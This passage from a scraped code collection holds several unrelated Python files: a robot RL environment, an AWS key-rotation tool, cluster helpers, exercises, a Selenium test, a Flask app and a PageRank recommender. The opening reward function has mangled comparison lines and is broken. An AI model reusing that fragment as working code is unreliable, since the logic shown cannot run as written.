1\n done = True\n else:\n reward -=1\n done=False\n self.my_robot.enable_suction(False)\n\n s_ = self.get_state()\n # print('re',reward)\n return s_, reward, done\n\n def reward_fun(self,d_t1,d_t2):\n r1=-d_t2\n if (d_t2<0.01):\n r2=5\n elif(0.01=0.7):\n r2=-2\n\n\n r3=-math.exp(1.2+d_t2)\n\n if(d_t2=d_t1):\n r4=0\n R1=4*r1+r2\n R2=r2+r3+r4\n # print('r1',r1,'r2',r2,'r3',r3,'r4',r4,'R1','R2',R2)\n return R1 ,R2\n\n def check_bound(self,joint_pos,outbound):\n pos_lim=np.array([[-170*degtorad*0.85,170*degtorad*0.85],\n [-85*degtorad*0.85,130*degtorad*0.85],\n [-170*degtorad*0.85,110*degtorad*0.85],\n [-190*degtorad*0.85,190*degtorad*0.85],\n 
[-125*degtorad*0.85,125*degtorad*0.85],\n [-360*degtorad*0.85,360*degtorad*0.85]])\n # print('lim',pos_lim[2])\n for i in range(6):\n if pos_lim[i][0]>joint_pos[i] or joint_pos[i]>pos_lim[i][1]:\n outbound=True\n return outbound\n\n\n def sample_action(self):\n return np.random.rand(4) # 4 joints\n\n def render(self):\n\n pass\n\n\nif __name__ == '__main__':\n env = robot_env()\n env.reset()\n # time.sleep(10)\n # while True:\n time.sleep(5)\n action = np.array([0, 0, 0, -0.5], dtype=np.float32)\n env.my_robot.move_4_joint(action)\n # env.step(env.sample_action())\n print(action *env.radtodeg)\n time.sleep(10)\n","repo_name":"ad45675/rl","sub_path":"vrep/DDPG_version/env_new.py","file_name":"env_new.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"32267369439","text":"import os\nimport time\nimport gc\nstart_time = time.time()\n\nif __name__ == '__main__':\n for i in range(1,60):\n cmd = 'python3 MusicAnalyse_TimeStep.py %d ' % (i)\n os.system(cmd)\n print('In length %d Final Time cost:' % i, time.time() - start_time)\n gc.collect()\n","repo_name":"naykun/MusicResearch","sub_path":"Dataset_Covertor/MusicPreprocessing/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"69842402450","text":"import logging\nfrom time import sleep\nfrom configparser import ConfigParser\nfrom contextlib import contextmanager\nfrom collections import namedtuple\n\nimport boto3\nimport coloredlogs\nfrom botocore.exceptions import ClientError\n\nfrom . import constants\n\nAccessKey = namedtuple(\"AccessKey\", \"id,status\")\n\n\nclass MaximumRetriesExceeded(Exception):\n pass\n\n\ndef retry(attempts, sleep_time):\n \"\"\"\n Retry decorator.\n\n Args:\n attempts (int): Number of attempts before throwing MaximumRetriesExceeded\n sleep_time (int): Time to sleep between attempts.\n Raises:\n MaximumRetriesExceeded\n \"\"\"\n\n def inner(fn):\n def _inner(*args, **kwargs):\n for _ in range(attempts):\n try:\n return fn(*args, **kwargs)\n except ClientError as error:\n if error.response[\"Error\"][\"Code\"] == \"InvalidClientTokenId\":\n sleep(sleep_time)\n else:\n raise error\n raise MaximumRetriesExceeded\n\n return _inner\n\n return inner\n\n\nclass IAMKeyRotator:\n def __init__(self, config):\n \"\"\"\n Initialization.\n\n Args:\n config (argparse.Namespace): Config values taken directly from the\n ArgumentParser in cli.py.\n \"\"\"\n self.config = config\n self.log = logging.getLogger(__name__)\n log_level = \"DEBUG\" if config.verbose else \"INFO\"\n coloredlogs.install(level=log_level, logger=self.log)\n\n @contextmanager\n def _credentials(self):\n \"\"\"\n Wrapper around parsing the credentials file, then writing it back if any\n changes are made.\n\n Use this as a context manager - e.g.:\n\n with self._credentials() as parser:\n do_stuff(parser)\n\n Yields:\n ConfigParser: ConfigParser object around the AWS credentials file.\n \"\"\"\n parser = ConfigParser()\n with open(self.config.credentials, \"r\") as fp:\n self.log.debug(\"Reading credentials file %s\", self.config.credentials)\n parser.read_string(fp.read())\n yield parser\n with open(self.config.credentials, \"w\") as fp:\n self.log.debug(\"Writing to credentials file %s\", self.config.credentials)\n parser.write(fp)\n\n @staticmethod\n def _contains_keypair(section):\n \"\"\"\n Determine if this section of the credentials 
file contains an aws_access_key_id\n and aws_secret_access_key.\n\n Args:\n section (configparser.SectionProxy): The section of the credentials file.\n\n Returns:\n bool: Whether this section contains aws_access_key_id and aws_secret_access_key.\n \"\"\"\n try:\n section[constants.AWS_ACCESS_KEY_ID]\n section[constants.AWS_SECRET_ACCESS_KEY]\n return True\n except KeyError:\n return False\n\n def _get_rotatable_profiles(self):\n \"\"\"\n Parses the credentials file and returns a list of all profiles that contain\n both an aws_access_key_id and aws_secret_access_key.\n\n Returns:\n List[str]: List of available profiles that contain access key IDs.\n \"\"\"\n with self._credentials() as parser:\n profiles = [\n section\n for section in parser.sections()\n if self._contains_keypair(parser[section])\n ]\n self.log.debug(\"Found profiles: %s\", profiles)\n return profiles\n\n def _get_boto_session(self, profile_name):\n \"\"\"\n Instantiates a boto session.\n\n Args:\n profile_name (str): Name of the connection profile to use for boto3.\n\n Returns:\n boto3.Session\n \"\"\"\n self.log.debug(\"Instantiating boto session with profile %s\", profile_name)\n return boto3.Session(profile_name=profile_name).client(\"iam\")\n\n def _get_access_keys(self, iam):\n \"\"\"\n Retrieves the users' access keys.\n\n Args:\n iam (boto3.Session): Boto3 session.\n\n Returns:\n List[AccessKey]: List of access keys and their status.\n \"\"\"\n access_keys = [\n AccessKey(\n id=key[constants.BOTO_ACCESS_KEY_ID],\n status=key[\"Status\"] == constants.ACTIVE,\n )\n for key in iam.list_access_keys()[constants.BOTO_ACCESS_KEY_METADATA]\n ]\n self.log.debug(\"Found access keys: %s\", access_keys)\n return access_keys\n\n def _create_key(self, profile_name):\n \"\"\"\n Creates a new access key, then immediately updates the credentials file with\n the new keys.\n\n Args:\n profile_name (str): Name of the connection profile to use for boto3.\n This also contains the credentials to be rotated.\n \"\"\"\n # Instantiate session with current credentials.\n iam = self._get_boto_session(profile_name)\n new_key = iam.create_access_key()[constants.BOTO_ACCESS_KEY]\n self.log.info(\n \"Created new access key %s\", new_key[constants.BOTO_ACCESS_KEY_ID]\n )\n with self._credentials() as parser:\n parser[profile_name][constants.AWS_ACCESS_KEY_ID] = new_key[\n constants.BOTO_ACCESS_KEY_ID\n ]\n parser[profile_name][constants.AWS_SECRET_ACCESS_KEY] = new_key[\n constants.BOTO_SECRET_ACCESS_KEY\n ]\n self.log.debug(\"Wrote new credentials for profile %s\", profile_name)\n\n @retry(attempts=20, sleep_time=3)\n def _inactivate_key(self, profile_name, access_key_id):\n \"\"\"\n Inactivates the given access key.\n\n This is usually called immediately after _create_key() is called, which does\n update the credentials file locally. 
The retry decorator ensures that this is\n being called with the correct, new credentials.\n\n Args:\n profile_name (str): Name of the connection profile to use for boto3.\n access_key_id (str): Access key ID to inactivate.\n \"\"\"\n self.log.debug(\"Attempting to inactivate access key %s\", access_key_id)\n iam = self._get_boto_session(profile_name)\n iam.update_access_key(AccessKeyId=access_key_id, Status=constants.INACTIVE)\n self.log.warning(\"Inactivated access key %s\", access_key_id)\n\n def _delete_key(self, profile_name, access_key_id):\n \"\"\"\n Deletes the given access key.\n\n Args:\n profile_name (str): Name of the connection profile to use for boto3.\n access_key_id (str): Access key ID to delete.\n \"\"\"\n self.log.debug(\"Attempting to delete access key %s\", access_key_id)\n iam = self._get_boto_session(profile_name)\n iam.delete_access_key(AccessKeyId=access_key_id)\n self.log.warning(\"Deleted access key %s\", access_key_id)\n\n def rotate_credentials(self, profile_name):\n \"\"\"\n Performs IAM keypair rotation.\n\n Args:\n profile_name (str): Name of the connection profile to use for boto3.\n \"\"\"\n self.log.info(\"Performing credential rotation for profile %s\", profile_name)\n iam = self._get_boto_session(profile_name)\n access_keys = self._get_access_keys(iam)\n statuses = [access_key.status for access_key in access_keys]\n\n # Handling deletions and inactivations prior to issuing a new key. If we need\n # to delete a key due to the two key limit, we must do that first.\n\n if statuses == [True]:\n old_key = access_keys[0]\n self._create_key(profile_name)\n self._inactivate_key(profile_name, old_key.id)\n elif statuses in ([True, False], [False, True]):\n # Delete inactive key, use \"current\" active key to issue new key,\n # then deactivate the \"current\" key.\n if access_keys[0].status:\n current_active = access_keys[0]\n current_inactive = access_keys[1]\n else:\n current_active = access_keys[1]\n current_inactive = access_keys[0]\n self._delete_key(profile_name, current_inactive.id)\n self._create_key(profile_name)\n self._inactivate_key(profile_name, current_active.id)\n elif statuses == [True, True]:\n # Delete the key that does *not* match the one in the credentials file.\n # Then generate a new key and inactivate the old.\n with self._credentials() as parser:\n key_id_in_file = parser[profile_name][constants.AWS_ACCESS_KEY_ID]\n if key_id_in_file == access_keys[0].id:\n key_to_delete = access_keys[1]\n key_to_inactivate = access_keys[0]\n else:\n key_to_delete = access_keys[0]\n key_to_inactivate = access_keys[1]\n self._delete_key(profile_name, key_to_delete.id)\n self._create_key(profile_name)\n self._inactivate_key(profile_name, key_to_inactivate.id)\n self.log.info(\"Credential rotation successful for profile %s!\", profile_name)\n\n def main(self):\n profiles = set(self._get_rotatable_profiles())\n if self.config.include:\n profiles &= set(self.config.include.split(\",\"))\n self.log.debug(\"Profiles after inclusions: %s\", profiles)\n if self.config.exclude:\n profiles -= set(self.config.exclude.split(\",\"))\n self.log.debug(\"Profiles after exclusions: %s\", profiles)\n for profile in profiles:\n self.rotate_credentials(profile)\n","repo_name":"davidjoliver86/aws-key-rotator","sub_path":"aws_key_rotator/rotator.py","file_name":"rotator.py","file_ext":"py","file_size_in_byte":9628,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"27135675345","text":"from typing import Dict, Any, 
Tuple, List\nimport networkx as nx\n\nfrom config import NODELIST_FILE_PATH\nfrom src.ktreads import KThread\n\n\ndef read_nodelist_from_file(nodelist_filepath: str = NODELIST_FILE_PATH) -> Dict[str, Dict[str, Any]]:\n \"\"\"\n Read list of cluster nodes from file.\n\n :param nodelist_filepath: Name of file with list of cluster nodes.\n :type nodelist_filepath: str\n\n :return: list of cluster nodes.\n :rtype: Dict[str, Dict[str, Any]]\n \"\"\"\n\n nodes = {}\n with open(nodelist_filepath, \"r\") as nodelist_file:\n for i, file_line in enumerate(nodelist_file):\n if not file_line.strip() or file_line.startswith(\"#\"):\n continue\n\n split_line = file_line.split(\" \")\n nodes[split_line[0]] = {\n \"IP\": split_line[0],\n \"hostname\": split_line[1],\n \"username\": split_line[2],\n \"out_intf\": split_line[3],\n \"controller\": (\n split_line[4],\n split_line[5].strip(),\n ),\n \"group\": i,\n \"IP_pool\": None,\n \"ssh\": None,\n \"ssh_chan\": None\n }\n\n return nodes\n\n\ndef get_networkx_graph(graph_data: Any) -> Tuple[nx.Graph, Dict[int, List[int]], Any]:\n \"\"\"\n Generate networkX graph from JSON string.\n\n :param graph_data: Json string, that describes graph.\n :type graph_data: Any\n\n :return:\n :rtype: Tuple[networkx.Graph, Dict[int, List[int]], Any]\n \"\"\"\n graph = nx.Graph()\n pos = {}\n for edge in graph_data[\"edges\"]:\n if int(edge[0]) not in graph.nodes():\n graph.add_node(int(edge[0]))\n pos[int(edge[0])] = [\n graph_data[\"pos\"][edge[0]][0],\n 0 - graph_data[\"pos\"][edge[0]][1],\n ]\n\n if int(edge[1]) not in graph.nodes():\n graph.add_node(int(edge[1]))\n pos[int(edge[1])] = [\n graph_data[\"pos\"][edge[1]][0],\n 0 - graph_data[\"pos\"][edge[1]][1],\n ]\n\n graph.add_edge(int(edge[0]), int(edge[1]))\n return graph, pos, graph_data[\"netapps\"]\n\n\ndef get_next_ip_pool(IP: str, hosts_number: int) -> str:\n \"\"\"\n Generate the first IP address on next IP address pool. Depends on IP address pool size.\n\n :param IP: The first address of current pool.\n :type IP: str\n :param hosts_number: The size of current pool.\n :type hosts_number: int\n\n :return: The first IP address of the next pool. 
The input and output IP addresses are strings.\n :rtype: str\n \"\"\"\n octets = IP.split(\".\")\n if int(octets[3]) + hosts_number >= 255:\n new_oct = divmod(int(octets[3]) + hosts_number, 255)\n next_ip_pool = (\n octets[0]\n + \".\"\n + octets[1]\n + \".\"\n + str(int(octets[2]) + int(new_oct[0]))\n + \".\"\n + str(int(new_oct[1]) + int(new_oct[0]))\n )\n else:\n next_ip_pool = (\n octets[0]\n + \".\"\n + octets[1]\n + \".\"\n + str(int(octets[2]))\n + \".\"\n + str(int(octets[3]) + hosts_number)\n )\n return next_ip_pool\n\n\ndef get_next_ip(ip: str) -> str:\n \"\"\"\n Generate the next IP address by incrementing the last octet of the current IP address.\n\n :param ip: The current IP address in the format 'x.x.x.x'.\n :type ip: str\n :return: The next incremented IP address in the format 'x.x.x.x'.\n :rtype: str\n \"\"\"\n octets = ip.split(\".\")\n if int(octets[3]) + 1 >= 255:\n next_ip = (\n octets[0] + \".\" + octets[1] + \".\" + str(int(octets[2]) + 1) + \".\" + \"1\"\n )\n else:\n next_ip = (\n octets[0]\n + \".\"\n + octets[1]\n + \".\"\n + octets[2]\n + \".\"\n + str(int(octets[3]) + 1)\n )\n return next_ip\n\n\ndef make_threaded(function: callable, args: List[Any], nodes: Dict[str, Dict[str, str]]) -> None:\n \"\"\"\n Launch a function in threads, where the number of threads is equal to the number of cluster nodes.\n\n :param function: The function to be executed in each thread.\n :type function: callable\n :param args: Arguments to be passed to the function.\n :type args: List[Any]\n :param nodes: Dictionary representing the cluster nodes map.\n :type nodes: Dict[str, Dict[str, str]]\n \"\"\"\n threads = []\n for node_label in nodes.values():\n thread = KThread(target=function, args=(node_label, *args))\n threads.append(thread)\n\n for thread in threads:\n thread.start()\n\n for thread in threads:\n thread.join()\n","repo_name":"mandesero/NPS-2","sub_path":"src/cluster_tools/cluster_support.py","file_name":"cluster_support.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32352064016","text":"try:\n\tprint(\"How_many_elements?\")\n\ta=int(input())\n\tarray = [0]*a\n\tfor i in range(len(array)):\n\t i = str(i + 1)\n\t print(\"Element \" + i, end = \" \")\n\t i = int(i)\n\t i = i - 1\n\t array[i] = int(input())\n\tprint(\"Delta:\")\n\tdelta = int(input())\n\tsmallest = array[0] if array else None\n\tfor i in array:\n\t\tif i < smallest:\n\t\t\tsmallest = i\n\tx = delta + smallest\n\tt = 0\n\tfor i in array:\n\t\tif i == x:\n\t\t\tt = t+1\n\tprint (\"Result: \", t)\t\t\nexcept ValueError :\n\tprint(\"Incorrect_data\")","repo_name":"PostnovaOlga/cp6","sub_path":"cp6.py","file_name":"cp6.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14841751189","text":"from datetime import date\nyear_current = date.today().year\namounts_users = 0 #Aqui está criando uma variável de contador vazio atribuindo 0 a variável para utilizar como contador p/ + \nsmaller_users = 0 #Aqui está criando uma variável pra utilizar como contador p/ -\nfor counter_year_users in range(1, 8):\n year_users = int(input(\"Em que ano a {}ª pessoa nasceu: \".format(counter_year_users)))\n age_users = year_current - year_users #Nessa variável está calculando a idade do usuário\n if age_users >= 18: #Nesse campo do if está vendo se a idade dos usuários são maior que 20\n amounts_users += 1 #Está somando caso 
seja igual o maior que 18 e adicionando a um contador\n else:\n smaller_users += 1 #Está somando caso seja menor do que a idade 18\nprint(\"Ao todo tivemos {} pessoas maiores de idade!\".format(amounts_users))\nprint(\"É também tivemos {} pessoas menores de idade\".format(smaller_users))","repo_name":"JeanDevv/Curso_python_projetos","sub_path":"Lista de exercícios/ex054.py","file_name":"ex054.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"28390207807","text":"from selenium.webdriver import Chrome\nfrom selenium.webdriver.common.keys import Keys\nimport unittest\n\nclass TestGoogle(unittest.TestCase):\n def test_GoogleでSeleniumLibraryを検索する(self):\n browser = Chrome()\n browser.get('https://google.co.jp')\n query_input = browser.find_element_by_name('q')\n query_input.send_keys('SeleniumLibrary' + Keys.ENTER)\n # 結果出力と検証\n links = browser.find_elements_by_css_selector('h3 > a')\n for link in links:\n print(link.text)\n self.assertEqual(len(links), 10)\n browser.quit()\n","repo_name":"thinkAmi-sandbox/RobotFramework-sample","sub_path":"selenium_getting_started/test_selenium.py","file_name":"test_selenium.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"42252501420","text":"import json\nimport csv\nimport datetime\nfrom collections import OrderedDict\nfrom GeneralHelpers import CheckFileExists\nfrom BPM_STAR_Extractors.DataPoint import DataPoint\nfrom BPM_STAR_Extractors.String_Parser import Parse\n\n\nclass MakeFile:\n\n @staticmethod\n def make_json_file(source_dict, filename, indent=None):\n date = datetime.date.today()\n date_string = date.strftime('%y%m%d')\n full_filename = date_string + filename + \".\" + DataPoint.EXT_json\n path = DataPoint.PATH_DataFiles + \"\\\\\" + full_filename\n with open(path, 'w') as file:\n json.dump(source_dict, file, indent=indent, ensure_ascii=False)\n print(full_filename + \" concluded\")\n\n @staticmethod\n def parsed_12mpp():\n # loads json file 12mpp raw data as a dictionary\n volume_data_raw_dict = json.load(open(DataPoint.data_12mpp))\n print(type(volume_data_raw_dict)) # dictionary\n nd = {}\n lista = []\n month_list = ['jan', 'fev', 'mar', 'abr', 'mai', 'jun', 'jul', 'ago', 'set', 'out', 'nov', 'dez', 'total']\n\n for key, val in volume_data_raw_dict.items():\n for i in val[1]:\n lista = Parse.parse(i)\n # TODO: change json from list with one string to only string\n nd[key[slice(1, 29)].strip().replace(' ', '')] = dict(zip(month_list, lista))\n\n date = datetime.date.today()\n date_string = date.strftime('%y%m%d')\n\n with open(DataPoint.PATH_DataFiles + \"\\\\\" + date_string + \"_12mpp_parsed.json\", \"w\") as f:\n json.dump(nd, f, indent=4, sort_keys=True, ensure_ascii=False)\n\n @staticmethod\n def bm_qvv_vol():\n b3902v = json.load(open(DataPoint.data_variant_final_data))\n dozempp = json.load(open(DataPoint.data_12mpp_parsed))\n\n bm_variants_dict = dict()\n for b in b3902v:\n bm_id = b['baumuster'][0:7]\n bm_variant = b['variant']\n total_vol_key = \"total\"\n variant_total_vol = 0\n if next(filter(lambda v: v == bm_variant, dozempp.keys()), None):\n variant_total_vol = int(dozempp[bm_variant][total_vol_key])\n if variant_total_vol <= 0:\n continue\n if bm_id not in bm_variants_dict.keys(): # create bm_key, start total, add variant\n bm_variants_dict[bm_id] = {total_vol_key: variant_total_vol, bm_variant: variant_total_vol}\n else: 
# add variant, update total\n updated_total = bm_variants_dict[bm_id][total_vol_key] + variant_total_vol\n bm_variants_dict[bm_id].update({total_vol_key: updated_total, bm_variant: variant_total_vol})\n\n MakeFile.make_json_file(bm_variants_dict, DataPoint.filename_bm_qvv_vol, 2)\n\n @staticmethod\n def bm_qvv():\n\n b3902v = json. load(open(DataPoint.data_variant_final_data))\n dozempp = json.load(open(DataPoint.data_12mpp_parsed))\n bm_dict = json.load(open(DataPoint.data_info_bm))\n\n swap_dict = {}\n for item in b3902v:\n if item['baumuster'][0] == 'C' and item['validity_index'] == 'S' and item['variant_plausibility'] == '1':\n if item['baumuster'][0:7] in bm_dict:\n info_bm = bm_dict[item['baumuster'][0:7]]\n else:\n info_bm = ['notfound', 'notfound']\n\n swap_dict[item['variant']] = {'description': item['aggregate_description'],\n 'baumuster': item['baumuster'],\n 'family': info_bm[1]\n }\n\n with open(DataPoint.PATH_DataFiles + \"\\\\\" + 'qvv_by_bm_by_family.csv', 'w', newline='\\n') as csvfile:\n wr = csv.writer(csvfile, quoting=csv.QUOTE_ALL)\n for variant, info in swap_dict.items():\n line = variant, info['description'], info['baumuster'], info['family']\n wr.writerow(line)\n\n return print('done')\n\n # for variant in swap_dict:\n # for data in bm_dict:\n # if variant['baumuster'][0:7] == data:\n # for dozempp_item in dozempp:\n # if item['baumuster'][0] == 'C' and item['validity_index'] == 'S' and item['variant_plausibility'] == '1':\n # if item['variant'] == dozempp_item:\n # swap_dict[item['variant']] = [namedtuple('description', item['aggregate_description']),\n # namedtuple('baumuster', item['baumuster']),\n # namedtuple('family', data[1]),\n # namedtuple('volume', dozempp_item['total'])\n # ]\n # else:\n # volume = 0\n # swap_dict[item['variant']] = [namedtuple('description', item['aggregate_description']),\n # namedtuple('baumuster', item['baumuster']),\n # namedtuple('family', data[1]),\n # namedtuple('volume', str(volume))\n # ]\n\n @staticmethod\n def concatenate_infos():\n b3902v = json.load(open(DataPoint.data_variant_final_data))\n dozempp = json.load(open(DataPoint.data_12mpp_parsed))\n bm_qvv_vol = json.load(open(DataPoint.data_qvv_bm_vol))\n bm_info = json.load(open(DataPoint.data_info_bm))\n variant_code_data = {val['variant']: val['codes'] for val in b3902v}\n\n end_dict = {}\n for (bm_id, variant_vol) in bm_qvv_vol.items():\n for (variant, vol) in variant_vol.items():\n if variant == \"total\":\n continue\n # TODO: Proper dictionary hierarchy, current structure reeks of go-horse\n end_dict[variant] = [[[bm_id, [bm_info[bm_id][0],\n bm_info[bm_id][1]]],\n dozempp[variant]],\n variant_code_data[variant]]\n\n MakeFile.make_json_file(end_dict, DataPoint.filename_dict_end, 4)\n\n\nclass MakeFinalDict:\n def __init__(self):\n if CheckFileExists.Check.open_file(DataPoint.data_final_dict):\n print('dict end available')\n self.qvv_data = json.load(open(DataPoint.data_final_dict))\n\n def variant_info_gen(self, month_data):\n\n qvvs_data = list((key, values[0][0][0], values[0][0][1][0],\n values[0][0][1][1], [i['code'] for i in values[1]], int(values[0][1][month_data]))\n for key, values in self.qvv_data.items() if values[0][1][month_data] is not '0')\n\n return qvvs_data\n\n def variant_model_gen(self, months, year):\n qvvs_data_dict = {\"year\": year, 'production': []}\n for month in months:\n monthly_production = {'month': '', # change to `month_year` and pass year along\n 'data': []}\n swap_list = []\n\n for key, values in self.qvv_data.items():\n if 
values[0][1][month] is not '0':\n main_dict = OrderedDict()\n main_dict['qvv'] = key\n main_dict['bm'] = values[0][0][0]\n main_dict['bu'] = values[0][0][1][0]\n main_dict['family'] = values[0][0][1][1]\n main_dict['composition'] = [i['code'] for i in values[1]]\n main_dict['volume'] = int(values[0][1][month])\n swap_list.append(main_dict)\n monthly_production['month'] = month\n monthly_production['data'] = swap_list\n qvvs_data_dict['production'].append(monthly_production)\n return qvvs_data_dict\n\n\n# MakeFile.parsed_12mpp()\n# time.sleep(5) # TODO:routine to analise if the new file is ready for next analisys\n# MakeFile.bm_qvv_vol()\n# time.sleep(5) # TODO:routine to analise if the new file is ready for next analisys\n# MakeFile.concatenate_infos()\n#\nmonth_list = ['jan', 'fev', 'mar', 'abr', 'mai', 'jun', 'jul', 'ago', 'set', 'out', 'nov', 'dez', 'total']\nyear = 2019\n#\ndate = datetime.date.today()\ndate_string = date.strftime('%y%m%d')\n#\nfor month in month_list:\n total_qvv_list = MakeFinalDict().variant_info_gen(month)\n\n with open(DataPoint.PATH_DataFiles + \"\\\\\" + date_string + \"_\" + month + '_qvvs.csv', 'w', newline='\\n') as csvfile:\n wr = csv.writer(csvfile, quoting=csv.QUOTE_ALL)\n for line in total_qvv_list:\n wr.writerow(line)\n\ntotal_qvv_dict = MakeFinalDict().variant_model_gen(month_list, year)\nwith open(DataPoint.PATH_DataFiles + \"\\\\\" + date_string + '_dictionary_qvvs_by_month.json', 'w') as f:\n json.dump(total_qvv_dict, f, indent=4, sort_keys=True, ensure_ascii=False)\n\n# MakeFile.bm_qvv()\n","repo_name":"dormanino/dataextractor","sub_path":"BPM_STAR_Extractors/12MPP_Extraction_Parser/Pro_Pmenu_Extractor.py","file_name":"Pro_Pmenu_Extractor.py","file_ext":"py","file_size_in_byte":9144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9539295889","text":"# -*- coding: utf-8 -*-\n\nfrom flask import render_template, url_for\nfrom flask_app import flask_app\nimport pandas as pd\nimport plotly.figure_factory as ff\nfrom plotly.offline import plot\n\nimport os\n\ndef loop_content():\n\n posts = [\n {\n 'header': 'Post 1',\n 'body': 'first content'\n },\n {\n 'header': 'Post 2',\n 'body': 'Second Content!'\n }\n ]\n return render_template('index.html', title='Home', posts=posts)\n\ndef has_no_empty_params(rule):\n ''' helper function for site-map \n '''\n defaults = rule.defaults if rule.defaults is not None else ()\n arguments = rule.arguments if rule.arguments is not None else ()\n return len(defaults) >= len(arguments)\n\n\n@flask_app.route('/')\n@flask_app.route('/index')\n@flask_app.route(\"/site-map\")\ndef site_map():\n '''\n https://stackoverflow.com/questions/13317536/get-list-of-all-routes-defined-in-the-flask-app\n '''\n \n links = []\n for rule in flask_app.url_map.iter_rules():\n # Filter out rules we can't navigate to in a browser\n # and rules that require parameters\n if \"GET\" in rule.methods and has_no_empty_params(rule):\n url = url_for(rule.endpoint, **(rule.defaults or {}))\n links.append({\"url\": url, \"route\": rule.endpoint})\n \n return render_template('site-map.html', title='Home', link_list=links)\n # links is now a list of url, endpoint tuples\n \n@flask_app.route(\"/hello-table\")\ndef hello_table():\n df = pd.read_csv(\"data/hello_world.csv\")\n fig = ff.create_table(df)\n return plot(fig, output_type='div')\n 
","repo_name":"john-telfeyan/flask-ploty-pd-template","sub_path":"flask_app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28481756577","text":"import csv\nimport pprint as pp\nimport networkx as nx\nimport itertools as it\nimport math\nimport scipy.sparse\nimport random\n\n\n\n\ndef pagerank(M, N, nodelist, alpha=0.85, personalization=None, max_iter=100, tol=1.0e-6, dangling=None):\n\tif N == 0:\n\t\treturn {}\n\tS = scipy.array(M.sum(axis=1)).flatten()\n\tS[S != 0] = 1.0 / S[S != 0]\n\tQ = scipy.sparse.spdiags(S.T, 0, *M.shape, format='csr')\n\tM = Q * M\n\t\n\t# initial vector\n\tx = scipy.repeat(1.0 / N, N)\n\t\n\t# Personalization vector\n\tif personalization is None:\n\t\tp = scipy.repeat(1.0 / N, N)\n\telse:\n\t\tmissing = set(nodelist) - set(personalization)\n\t\tif missing:\n\t\t\t#raise NetworkXError('Personalization vector dictionary must have a value for every node. Missing nodes %s' % missing)\n\t\t\tprint\n\t\t\tprint('Error: personalization vector dictionary must have a value for every node')\n\t\t\tprint\n\t\t\texit(-1)\n\t\tp = scipy.array([personalization[n] for n in nodelist], dtype=float)\n\t\t#p = p / p.sum()\n\t\tsum_of_all_components = p.sum()\n\t\tif sum_of_all_components > 1.001 or sum_of_all_components < 0.999:\n\t\t\tprint\n\t\t\tprint(\"Error: the personalization vector does not represent a probability distribution :(\")\n\t\t\tprint\n\t\t\texit(-1)\n\t\n\t# Dangling nodes\n\tif dangling is None:\n\t\tdangling_weights = p\n\telse:\n\t\tmissing = set(nodelist) - set(dangling)\n\t\tif missing:\n\t\t\t#raise NetworkXError('Dangling node dictionary must have a value for every node. Missing nodes %s' % missing)\n\t\t\tprint\n\t\t\tprint('Error: dangling node dictionary must have a value for every node.')\n\t\t\tprint\n\t\t\texit(-1)\n\t\t# Convert the dangling dictionary into an array in nodelist order\n\t\tdangling_weights = scipy.array([dangling[n] for n in nodelist], dtype=float)\n\t\tdangling_weights /= dangling_weights.sum()\n\tis_dangling = scipy.where(S == 0)[0]\n\n\t# power iteration: make up to max_iter iterations\n\tfor _ in range(max_iter):\n xlast = x\n x = alpha * (x * M + sum(x[is_dangling]) * dangling_weights) + (1 - alpha) * p\n # check convergence, l1 norm\n err = scipy.absolute(x - xlast).sum()\n if err < N * tol:\n return dict(zip(nodelist, map(float, x)))\n\t#raise NetworkXError('power iteration failed to converge in %d iterations.' 
% max_iter)\n\tprint\n\tprint('Error: power iteration failed to converge in '+str(max_iter)+' iterations.')\n\tprint\n\texit(-1)\n\n\n\n\ndef create_graph_set_of_users_set_of_items(user_item_ranking_file):\n\tgraph_users_items = {}\n\tall_users_id = set()\n\tall_items_id = set()\n\tg = nx.DiGraph()\n\tinput_file = open(user_item_ranking_file, 'r')\n\tinput_file_csv_reader = csv.reader(input_file, delimiter='\\t', quotechar='\"', quoting=csv.QUOTE_NONE)\n\tfor line in input_file_csv_reader:\n\t\tuser_id = int(line[0])\n\t\titem_id = int(line[1])\n\t\trating = int(line[2])\n\t\tg.add_edge(user_id, item_id, weight=rating)\n\t\tall_users_id.add(user_id)\n\t\tall_items_id.add(item_id)\n\tinput_file.close()\n\tgraph_users_items['graph'] = g\n\tgraph_users_items['users'] = all_users_id\n\tgraph_users_items['items'] = all_items_id\n\treturn graph_users_items\n\n\ndef create_item_item_graph(graph_users_items):\n g = nx.Graph()\n items = list(graph_users_items.get('items'))\n gui = graph_users_items.get('graph').to_undirected()\n \n for i in range(len(items)):\n for j in range(i):\n movie1 = gui[items[i]]\n movie2 = gui[items[j]]\n users1 = set(movie1.keys())\n users2 = set(movie2.keys())\n weight = len(users1.intersection(users2))\n if weight > 0:\n g.add_edge(items[i], items[j], weight=weight)\n \n graph_users_items['items_iig'] = set(g.nodes())\n return g\n\n\n\n\ndef create_preference_vector_for_teleporting(user_id, graph_users_items):\n preference_vector = {}\n\n items_iig = graph_users_items.get('items_iig')\n\n gui = graph_users_items.get('graph')\n items_from_user = set(gui[user_id]).intersection(items_iig)\n sum_all_scores = 0\n for i in items_from_user:\n sum_all_scores = sum_all_scores + gui[user_id][i]['weight']\n\n for i in items_from_user:\n preference_vector[i] = gui[user_id][i]['weight']/sum_all_scores\n \n for i in items_iig:\n if preference_vector.get(i) == None:\n preference_vector[i] = 0\n \n return preference_vector\n\t\n\n\n\ndef 